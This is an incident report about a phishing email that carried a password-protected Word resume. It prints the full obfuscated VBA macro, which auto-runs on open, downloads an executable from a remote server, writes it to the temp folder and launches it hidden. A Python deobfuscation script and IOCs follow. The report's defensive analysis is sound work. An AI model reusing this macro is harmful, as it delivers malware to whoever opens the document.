February 21, 2019

Incident Report: CV or Cyber Vector.

Perception Point Incident Response Team

Would You Hire a Hacker?

Would you? The HR department of one of our clients received an email containing a resume. The email stated that the attached Word document was password protected and provided the password in the body of the email.

The user has to enter the password manually, a step that causes problems for automated systems that scan the file for malicious activity. Once the user enters the password, the file turns out to be a common attack: a malicious macro that executes malicious commands. The macro code is also encrypted, making detection even harder. Perception Point's file decryption feature extracts the malicious code from the encrypted file. The code downloads a malicious exe from a server into the temp folder and runs it.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-run entry point: fires as soon as the document is opened (after the password is entered)
Private Sub Document_Open()
Dim WinHttpReq As Object
' HTTP client object used for the download
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    
' The payload is fetched under a .jpg name; the response body is the executable saved below
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
WinHttpReq.send
Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    ' Strings are built character by character to hide them: first5 = "ADODB.Stre"
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    ' second5 = "am"
    second5 = ChrW(97) & ChrW(109)
    ' last5 = "ADODB.Stream", the COM object used to write binary data to disk
    last5 = first5 + second5
xyuhjnx = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Open
    ' Val("1FFF") evaluates to 1 (adTypeBinary)
    oStream.Type = Val("1FFF")
    oStream.Write WinHttpReq.responseBody
    
    Dim first6 As String
    Dim last6 As String
    ' first6 = "\check.exe"; built but never used
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    
    ' Val("2FFF") evaluates to 2 (adSaveCreateOverWrite); drops %TEMP%\qwerty2.exe
    oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
    oStream.Close
    
End If
 
' Runs the dropped file with a hidden window (0 = vbHide); note this sits outside the If, so it runs even when the download failed
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub
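To show how a defender can peel back this kind of string-building obfuscation without ever running the document, here is an added Python example (not from the report and not Perception Point's tooling). It decodes ChrW() runs into literals, constant-folds the helper variables so that CreateObject(last5) is recognised as CreateObject("ADODB.Stream"), and flags the download-drop-execute behaviours seen above. The VBA it analyses is a trimmed copy of the macro printed in the report, embedded as constructed sample input; the indicator list and its descriptions are the example's own choices.

```python
import re

# Constructed sample input: a trimmed copy of the Document_Open macro shown in the
# report, embedded here so the script runs offline.
SAMPLE_VBA = r'''
Private Sub Document_Open()
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
WinHttpReq.send
first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
second5 = ChrW(97) & ChrW(109)
last5 = first5 + second5
If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Type = Val("1FFF")
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
End If
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub
'''

# A run of Chr()/ChrW() calls glued together with & or +, e.g. ChrW(65) & ChrW(68)
CHR_RUN = re.compile(r'ChrW?\(\s*\d+\s*\)(?:\s*[&+]\s*ChrW?\(\s*\d+\s*\))*')
CHR_ONE = re.compile(r'ChrW?\(\s*(\d+)\s*\)')
# name = expr  (a leading "Set" is tolerated and ignored)
ASSIGN = re.compile(r'^\s*(?:Set\s+)?(\w+)\s*=\s*(.+?)\s*$', re.M)
URL = re.compile(r'https?://[^\s"\']+')

# Behaviours worth flagging, keyed by the substring that reveals them (example's own list)
SUSPICIOUS = {
    'Document_Open': 'auto-executes when the document is opened',
    'Microsoft.XMLHTTP': 'HTTP client object used for the download',
    'ADODB.Stream': 'binary stream used to write downloaded bytes to disk',
    'Environ("Temp")': 'drop location in the user temp folder',
    '.exe': 'executable written to or launched from disk',
    'Shell(': 'launches the dropped file',
}


def decode_chr_runs(src):
    """Replace each run of Chr/ChrW calls with the string literal it builds."""
    def repl(m):
        text = ''.join(chr(int(n)) for n in CHR_ONE.findall(m.group(0)))
        return '"' + text + '"'
    return CHR_RUN.sub(repl, src)


def fold_string_vars(src):
    """Constant-fold variables assembled from string literals and other folded variables.

    Returns {variable: value}. Assignments involving anything else (function calls,
    numbers) are left alone. Literals containing & or + are not handled.
    """
    values = {}
    for name, expr in ASSIGN.findall(src):
        parts = [p.strip() for p in re.split(r'\s*[&+]\s*', expr)]
        pieces = []
        for p in parts:
            if len(p) >= 2 and p[0] == '"' and p[-1] == '"':
                pieces.append(p[1:-1])
            elif p in values:
                pieces.append(values[p])
            else:
                pieces = None
                break
        if pieces is not None:
            values[name] = ''.join(pieces)
    return values


def analyze_macro(src):
    """Decode, fold and flag. Returns the folded strings, matched indicators and URLs."""
    decoded = decode_chr_runs(src)
    strings = fold_string_vars(decoded)
    # Search both the decoded source and the folded values so that
    # CreateObject(last5) is recognised as CreateObject("ADODB.Stream")
    haystack = decoded + '\n' + '\n'.join(strings.values())
    indicators = {k: v for k, v in SUSPICIOUS.items() if k in haystack}
    return {'strings': strings, 'indicators': indicators, 'urls': URL.findall(decoded)}


if __name__ == '__main__':
    report = analyze_macro(SAMPLE_VBA)
    for name, value in report['strings'].items():
        print(f'{name} = {value!r}')
    for key, why in report['indicators'].items():
        print(f'[!] {key}: {why}')
    print('URLs:', report['urls'])
```

The script works on VBA source as text, so it can be pointed at the output of any macro-extraction tool; on the sample above it recovers "ADODB.Stream", the unused "\check.exe", the download URL and all six indicators.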

 

IOCs

C2 server IP: 209.141.55.226
qwerty2.exe SHA-256: 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (VirusTotal score 12/69 as of 2019-02-21 15:13:33 UTC)
